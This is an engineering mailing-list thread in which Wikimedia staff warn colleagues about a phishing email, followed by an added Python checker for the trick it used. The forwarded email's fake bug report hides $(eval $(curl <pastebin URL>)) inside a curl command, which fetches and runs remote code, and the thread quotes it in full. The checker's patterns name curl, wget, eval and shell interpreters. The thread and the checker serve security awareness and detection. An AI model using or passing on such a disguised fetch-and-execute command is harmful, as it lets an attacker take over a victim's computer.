[Engineering] PLEASE READ: (unsuccessful) compromise attempt

Toby Negrin tnegrin at wikimedia.org
Thu Jun 15 19:28:18 UTC 2017


Thanks Aeryn -- we all appreciate your concern about our security! Please
keep the updates coming.

-Toby

On Thu, Jun 15, 2017 at 12:25 PM, Aeryn Palmer <apalmer at wikimedia.org>
wrote:

> Hi All,
>
> Just a note - the claims in the message some of us got this morning have
> already been examined and found to be a false alarm. Should have checked
> before I sent this email. Thanks, all!
>
> Cheers,
>
> Aeryn
>
> On Thu, Jun 15, 2017 at 12:15 PM, Aeryn Palmer <apalmer at wikimedia.org>
> wrote:
>
>> This appears to be from the same person who sent the email earlier this
>> morning about an alleged leak, to whom Chad responded. Did anyone click the
>> link they provided in that email?
>>
>> Cheers,
>>
>> Aeryn
>>
>> On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
>> wrote:
>>
>>> Hi,
>>>
>>> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
>>>
>>> I just got an email, found below, which seems initially legitimate, but
>>> on a more careful read is malicious and an attempt to compromise my
>>> computer. Thankfully I don't have the habit of copy/pasting commands on
>>> my terminal and I read this email carefully, so I was not a victim of
>>> this.
>>>
>>> The email seems innocuous enough, by mentioning my name and an otherwise
>>> legitimate body pointing an API issue with a URL that looks like an
>>> api.php URL of ours. It suggests running a curl to reproduce, but if you
>>> look more carefully, that curl has $(eval $(curl
>>> https://pastebin.com/raw/xSWbdNAK) in it.
>>>
>>> That pastebin URL above contains an exec() of a base64 string, which, in
>>> turn, decoded, is a Python script that fetches and exec()s the contents
>>> of a URL. I have NOT fetched that URL yet, so I don't know what the
>>> contents are.  I'd advise to not do that either, unless done carefully
>>> from a sandboxed, unprivileged environment. It will also likely let the
>>> attacker know that someone accessed it, and possibly let them know that
>>> we're on to them.
>>>
>>> Please be on the lookout for similar attempts, and let security@ and ops
>>> know immediately if you get similar ones, or if you are suspicious of
>>> any other emails or weird behavior on your computer. Please also let us
>>> know IMMEDIATELY if you suspect you fell victim to one of these attacks.
>>> Make sure to confirm that your message was received. If in doubt, call
>>> me or other opsens on our cellphones, as found on officewiki's
>>> Contact_list.
>>>
>>> We also had a targeted phishing attempt last week, by someone pertaining
>>> to be Katherine and attempting to extract donor data, so it's possible
>>> it's the same person trying a different angle. They may try other
>>> angles as well, so I'd advise everyone to be vigilant.
>>>
>>> Best,
>>> Faidon
>>> --
>>> Faidon Liambotis
>>> Principal Operations Engineer
>>> Wikimedia Foundation
>>>
>>>
>>>
>>> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com> -----
>>>
>>> Date: Thu, 15 Jun 2017 10:45:35 -0700
>>> From: Joshua Wilson <joshuaswillson at gmail.com>
>>> To: fliambotis at wikimedia.org
>>> Subject: Wikipedia REST API Issues
>>>
>>> Greetings Faidon,
>>>
>>>
>>> It seems as if the api `query` endpoint at the English Wikipedia is down. A
>>> simple "hello" api call as shown below responds with an internal server
>>> error. Further calls to the same endpoint result in the request timing out,
>>> until the endpoint is reachable again.
>>>
>>> [added by faidon: DO NOT RUN THIS COMMAND]
>>> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
>>> $(curl
>>> https://pastebin.com/raw/xSWbdNAK)
>>> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
>>> [added by faidon: DO NOT RUN THIS COMMAND]
>>>
>>> I'm interested in using english wikipedia data for some AI language
>>> comprehension research.
>>>
>>> If you could take a look, and possibly let me know if/when this service
>>> will be up, I would greatly appreciate it. I couldn't find any scheduled
>>> downtime information online, so I apologize if this behavior is expected.
>>>
>>> Thanks,
>>>
>>> Chelsea Anders
>>>
>>> ----- End forwarded message -----
>>>
>>
>>
>>
>> --
>> Aeryn Palmer
>> Legal Counsel
>> Wikimedia Foundation
>> 149 New Montgomery Street, 6th Floor
>> San Francisco, CA 94105
>> apalmer at wikimedia.org
>> 415.839.6885 (Office)
>> 415.882.0495 (Fax)
>> *California Registered In-House Counsel*
>>
>> *NOTICE: This message may be confidential or legally privileged. If you
>> have received it by accident, please delete it and let us know about the
>> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
>> reasons, I cannot give legal advice to, or serve as a lawyer for, community
>> members, volunteers, or staff members in their personal capacity. For more
>> on what this means, please see our legal disclaimer
>> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>>
> _______________________________________________
> Engineering mailing list
> Engineering at lists.wikimedia.org
> https://lists.wikimedia.org/mailman/listinfo/engineering
>
>
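Added example, not part of the original thread: a small Python check for the pattern Faidon describes, a `curl` command whose URL hides nested `$(...)` command substitution that fetches and evaluates remote content. The function names, verdict strings and the placeholder paste URL are assumptions made for this illustration.

```python
import re

FETCH = re.compile(r"\b(curl|wget)\b")
EVAL = re.compile(r"\b(eval|exec|source|sh|bash|python[0-9.]*)\b")

# Constructed sample shaped like the command quoted in the thread; the paste
# URL is a placeholder, not the one from the email.
SAMPLE = ("curl https://en.wikipedia.org/w/api.php?action=query\\&titles="
          "$(eval $(curl https://paste.example.invalid/raw/PLACEHOLDER) \\\\\\&)"
          "Main%20Page\\&format=json")

def substitutions(cmd, depth=1):
    """Yield (depth, body) for each $(...) or `...` the shell would run.
    Single-quoted text is skipped; double quotes are not, since $() runs there."""
    i, n, in_single = 0, len(cmd), False
    while i < n:
        c = cmd[i]
        if in_single:
            in_single = c != "'"
        elif c == "\\":
            i += 1                      # skip the escaped character
        elif c == "'":
            in_single = True
        elif c == "`" or (cmd.startswith("$(", i) and not cmd.startswith("$((", i)):
            start = i + (1 if c == "`" else 2)
            j, level = start, 1
            while j < n and level:      # find the matching close
                if cmd[j] == "\\":
                    j += 1
                elif c == "`":
                    level -= cmd[j] == "`"
                else:
                    level += (cmd[j] == "(") - (cmd[j] == ")")
                j += 1
            body = cmd[start:j - 1] if level == 0 else cmd[start:]
            yield depth, body
            yield from substitutions(body, depth + 1)   # nested substitutions
            i = j - 1
        i += 1

def assess(cmd):
    """Classify a command copied from an untrusted message before it is run."""
    found = list(substitutions(cmd))
    if not found:
        return "no-substitution", found
    remote = any(FETCH.search(body) for _, body in found)
    evaluated = any(EVAL.search(body) for _, body in found)
    verdict = "remote-code-execution" if remote and evaluated else "substitution"
    return verdict, found
```

`assess(SAMPLE)` reports two nested substitutions and the verdict `remote-code-execution`; the same URL wrapped in single quotes reports `no-substitution`, because the shell does not expand anything inside single quotes.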